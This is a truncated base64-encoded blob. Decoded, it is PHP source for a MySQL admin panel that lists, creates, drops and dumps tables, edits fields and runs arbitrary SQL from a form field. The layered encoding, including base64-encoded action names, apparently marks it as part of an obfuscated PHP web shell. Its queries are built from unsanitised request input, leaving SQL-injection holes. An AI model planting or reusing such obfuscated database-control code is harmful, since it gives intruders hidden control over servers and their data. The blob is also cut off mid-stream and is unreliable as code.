QX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHR